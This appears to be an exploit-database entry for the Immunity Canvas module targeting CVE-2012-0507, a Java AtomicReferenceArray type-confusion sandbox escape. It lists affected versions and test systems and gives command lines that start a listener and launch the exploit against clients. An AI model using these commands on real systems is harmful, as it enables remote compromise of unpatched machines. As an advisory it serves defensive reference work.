Lucene search

K
canvasImmunity CanvasJAVA_ATOMICREFERENCEARRAY
HistoryJun 07, 2012 - 10:55 p.m.

Immunity Canvas: JAVA_ATOMICREFERENCEARRAY

2012-06-0722:55:00
Immunity Canvas
exploitlist.immunityinc.com
30

EPSS

0.967

Percentile

99.7%

Name java_AtomicReferenceArray
CVE CVE-2012-0507 Exploit Pack
VENDOR: Sun
Notes:
There is a Type Confusion vulnerability in java.util.concurrent.atomic.AtomicReferenceArray class.
When creating a new instance of an AtomicReferenceArray the array type has to be specified, however the AtomicReferenceArray.set method
does not properly check the object type being inserted.
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox.

Affected versions
JDK and JRE 7 Update 2 and earlier
JDK and JRE 6 Update 30 and earlier
JDK and JRE 5.0 Update 33 and earlier
SDK and JRE 1.4.2_35 and earlier

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
Date public: 02/14/2012